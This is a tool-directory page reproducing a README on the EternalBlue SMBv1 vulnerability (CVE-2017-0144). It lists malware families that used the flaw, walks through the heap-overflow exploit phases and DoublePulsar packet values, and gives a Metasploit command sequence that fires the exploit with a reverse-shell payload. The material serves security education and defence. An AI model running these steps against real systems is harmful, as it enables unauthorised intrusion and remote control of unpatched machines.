Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Blackash-CVE-2017-0144 — CVE-2017-0144 | Kitploit
Tools/GitHubGitHub/firetemple/blackash-cve-2017-0144
Vulnerability AnalysisExploitationForensicsMalware AnalysisPenetration TestingThreat IntelligenceIntrusion DetectionLearning & EducationCurated Resources
GitHubfiretemple/blackash-cve-2017-0144

Blackash-CVE-2017-0144

CVE-2017-0144

15910 months agoNot yet reviewed
View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🌐 CVE-2017-0144 — EternalBlue: Microsoft Windows SMBv1 Remote Code Execution Vulnerability

EternalBlue

"One exploit. Dozens of malware families. Billions in damage."


🔍 One-line summary

CVE-2017-0144 is a critical remote code-execution vulnerability in the SMBv1 server implementation in Microsoft Windows. The exploit known as EternalBlue abused this hole and was used in high-impact attacks (notably WannaCry).


🔥 Top 10 Malware Using EternalBlue (Detailed)

#MalwareTypeFirst SeenActorDamageNotes
1WannaCryRansomwareMay 12, 2017Lazarus Group (DPRK)$4–8BKillswitch: iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
2NotPetyaWiper (Posed as Ransomware)Jun 27, 2017Sandworm (Russia)$10B+Used Mimikatz + EternalBlue + PSEXEC
3Bad RabbitRansomwareOct 24, 2017Indrik SpiderRegionalFake Flash update drive-by
4UiwixRansomwareMay 2017UnknownLowNo killswitch, stealthier than WannaCry
5EternalRocksWormMay 2017UnknownMedium7 NSA tools (incl. DoublePulsar)
6AdylkuzzCryptominerMay 2017UnknownHigh (silent)Mined Monero before WannaCry
7RetefeBanking Trojan2017–2018UnknownEU BanksUsed EternalBlue for lateral movement
8TrickBotModular Malware2017–2021Wizard SpiderGlobalDropped Ryuk via EternalBlue
9EmotetLoader2017–2021TA542GlobalUsed as entry for Cobalt Strike
10Clop / DridexRansomware2019–2025TA505Healthcare, GovStill active in 2025

🧨 EternalBlue Exploit Evolution

eternelblue1
ToolReleaseFeatures
EternalBlue (Original)Apr 2017 (Shadow Brokers)SMBv1 RCE
DoublePulsarApr 2017Backdoor implant (ring0)
EternalRomanceApr 2017SMBv3 variant
EternalChampionApr 2017Alternative SMB path
Metasploit ModuleMay 2017exploit/windows/smb/ms17_010_eternalblue
FuzzBunchApr 2017NSA exploit framework
Impacket + PSEXEC2017–2025Python SMB exploitation
eternelblue2

🔍 How CVE-2017-0144 (EternalBlue) Was Exploited

A Step-by-Step Technical Deep Dive into the SMBv1 RCE

"One malformed packet. Full SYSTEM access. No login. No click."


🎯 TL;DR Exploit Flow

[Attacker] 
   │
   ├──▶ Sends crafted SMBv1 **Trans2** request
   │       → Triggers **heap overflow** in `srv!SrvOS2FeaListSizeToNt`
   │
   ├──▶ Overwrites function pointers → **kernel shellcode**
   │
   └──▶ Executes **DoublePulsar** backdoor → **Ring-0 payload**
           (e.g., WannaCry `mssecsvc.exe`)

🛠️ Prerequisites for Exploitation

RequirementDetails
TargetWindows with SMBv1 enabled (default pre-Win10)
Port Open445/TCP (or 139/TCP via NetBIOS)
No AuthUnauthenticated — no username/password needed
Architecturex86 or x64 (both supported)
Patch StatusUnpatched (pre-MS17-010)

🚀 Exploit Phases (7 Steps)

Phase 1: SMB Protocol Negotiation

SMB_COM_NEGOTIATE → Client sends dialect list
Server responds: SMBv1 supported → Proceed

Why? Confirms SMBv1 is active.


Phase 2: Tree Connect to IPC$

eternelblue3
\\TARGET\IPC$ → Anonymous share for SMB pipes

Purpose: Establishes a session to send transaction requests.


Phase 3: Trans2 Session Setup (Primary)

  • Uses SMB_COM_TRANSACTION2 (0x32)
  • Subcommand: SESSION_SETUP
  • Sets up FEALIST structure with malformed size
FEALIST {
    SizeOfListInBytes = 0xFFFF (or large value)
    ...
}

Bug Trigger: SrvOS2FeaListSizeToNt() trusts this size without bounds check.


Phase 4: Secondary Trans2 Request (Overflow)

  • Sends multiple secondary packets
  • Each contains oversized FEALIST + FEA (File Extended Attributes)
eternelblue4
FEA {
    AttributeNameLength = 0x00
    AttributeName = "A" * 0x1000  → Overflow buffer
}

Heap Spray: Allocates large chunks to control memory layout.


Phase 5: Buffer Overflow in Kernel

srv!SrvOS2FeaListSizeToNt(
    PFEALIST FeaList,      // attacker-controlled
    PULONG pNtFeaListSize  // output pointer
)
{
    // No validation of FeaList->SizeOfListInBytes
    memcpy(dest, src, FeaList->SizeOfListInBytes);  // BOOM
}

Result:

  • Heap overflow → Overwrite adjacent kernel objects
  • Target: SRVNET_BUFFER or POOL_HEADER
  • Overwrite function pointers (e.g., Free routine)

Phase 6: Kernel Shellcode Execution

  • Attacker controls RIP/EIP via overwritten function pointer
  • Jumps to shellcode in non-paged pool

Shellcode Does:

  1. Ring-0 → Ring-3 transition (via KeUserModeCallback)
  2. Allocates user-mode memory
  3. Downloads/stages payload (e.g., mssecsvc.exe)
  4. Installs DoublePulsar backdoor

Phase 7: DoublePulsar Backdoor Implant

eternelblue6
  • Injects kernel driver (0x00120034 XOR key)
  • Listens for magic SMB packets:
    • Ping: 0x0002C001
    • Exec: 0x0002C002 + payload

WannaCry Example:

EternalBlue → DoublePulsar → mssecsvc.exe → tasksche.exe → Encrypts files

🧨 Exploit Packet Structure (Simplified)

SMB Header
└── Command: 0x32 (TRANSACTION2)
    └── Setup: 0x000E (SESSION_SETUP)
        └── Parameter: TotalDataCount = 0x1000
            └── Data: 
                [FEALIST]
                  SizeOfListInBytes = 0x1100
                  [FEA #1] NameLen=0, Name="A"*0x1000
                  [FEA #2] ...
                [GROOM x100] → Spray heap
                [OVERFLOW] → Overwrite pool
                [SHELLCODE] → x64 ring0

🛠️ Real Exploit Tools

ToolLanguageModule
MetasploitRubyexploit/windows/smb/ms17_010_eternalblue
ImpacketPythonsmbclient.py, psexec.py
FuzzBunchPython (NSA)EternalBlue-2.2.0
Custom C2C/C++WannaCry, NotPetya

Metasploit Example

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
exploit

🔬 Memory Forensics Evidence

Download Tool